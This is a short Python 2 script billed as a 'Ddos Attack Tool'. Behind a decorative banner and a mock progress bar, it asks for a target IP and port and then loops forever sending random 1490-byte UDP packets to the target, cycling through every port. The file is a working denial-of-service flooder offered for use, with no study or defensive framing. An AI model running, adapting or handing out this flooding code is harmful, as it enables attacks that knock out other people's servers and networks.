#!/usr/bin/python2
#coding=utf-8
#Nurul Amin Mahfuj
#Ddos Attack Tool
#Supprt By Md Roky Khan 

import sys
import os
import time
import socket
import random
#Code Time
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year

##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############
os.system("clear")
print """
 \033[1;96m ------------------------
 \033[1;32m < NURUL AMIN MAHFUJ >
 \033[1;96m ------------------------
\033[1;96m
  =====================================================
                    ASSALAMU ALAIKUM                    
             Coded By : Nurul Amin Mahfuj       
               Facebook : Nurul Amin Mahfuj                    
           Website : https://github.com/mahfuj420          
    ---------------    ---------------    ------------  
                    Kingz Tor Abbu [N.A.M]                  
  =====================================================
\033[1;94m------------------------------------+-----------------')
\033[1;95m _           _______     _______ ') 
\033[1;95m( (    /|   (  ___  )   (       )')
\033[1;95m|  \  ( |   | (   ) |   | () () |')
\033[1;95m|   \ | |   | (___) |   | || || |')
\033[1;92m| (\ \) |   |  ___  |   | |(_)| |')
\033[1;92m| | \   |   | (   ) |   | |   | |')
\033[1;92m| )  \  | _ | )   ( | _ | )   ( |')
\033[1;92m|/    )_)(_)|/     \|(_)|/     \|')
\033[1;95m------------------------------------+-----------------')"""
		
os.system("figlet DDos Attack")
print
print "𝑊𝑒𝑙𝑐𝑜𝑚𝑒 𝑇𝑜 𝑁.𝐴.𝑀 𝑀𝑎ℎ𝑓𝑢𝑗"
print "𝐷𝑑𝑜𝑠 𝐴𝑡𝑡𝑎𝑐𝑘 𝐸𝑟 𝐶𝑜𝑚𝑎𝑛𝑑𝑒 𝐴𝑝𝑛𝑒𝑘𝑒 𝑆𝑎𝑔𝑜𝑡𝑜𝑚"
print "𝐴𝑔𝑒𝑟 𝐼𝑑 𝐻𝑜𝑔𝑎 𝑀𝑎𝑟𝑎 𝐾ℎ𝑎𝑖𝑦𝑎 𝑆𝑎𝑑ℎ𝑢 𝐻𝑜𝑖𝑦𝑎 𝐺𝑒𝑐ℎ𝑖"
print "𝐶𝑟𝑒𝑎𝑡𝑒𝑑      𝑁𝑢𝑟𝑢𝑙 𝐴𝑚𝑖𝑛 𝑀𝑎ℎ𝑓𝑢𝑗"
print
ip = raw_input("IP Target : ")
port = input("Port       : ")

os.system("clear")
os.system("figlet Attack Starting")
print "[      Wait          ] 0% "
time.sleep(5)
print "[=====   Baby        ] 25%"
time.sleep(5)
print "[==========Thap      ] 50%"
time.sleep(5)
print "[=============== Is  ] 75%"
time.sleep(5)
print "[========Coming=======] 100%"
time.sleep(3)
sent = 0
while True:
     sock.sendto(bytes, (ip,port))
     sent = sent + 1
     port = port + 1
     print "Sent %s packet to %s throught port:%s"%(sent,ip,port)
     if port == 65534:
       port = 1
